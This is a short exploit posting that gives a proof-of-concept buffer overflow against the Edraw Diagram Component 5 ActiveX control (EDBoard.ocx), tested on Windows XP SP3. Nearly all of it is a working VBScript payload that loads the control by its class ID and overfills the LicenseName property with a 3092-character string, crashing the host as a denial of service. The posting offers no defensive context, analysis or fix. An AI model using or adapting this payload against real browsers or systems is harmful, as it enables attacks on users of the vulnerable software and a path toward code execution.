Edraw Diagram Component 5 active-x buffer overflow proof of concept denial of service exploit.
428ea6a0fb5b774ad26363a005e9f41084184866a058959a2cbd7e8fec064e19
Author : Senator of Pirates
This exploit tested on Windows Xp SP3 EN
http://www.edrawsoft.com/download/EDBoardSetup.exe
--------------------------------------------------------------------------------------------------------
<object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid = "EDBoardLib.EDBoard"
argCount = 1
arg1=String(3092, "A")
target.LicenseName = arg1
</script>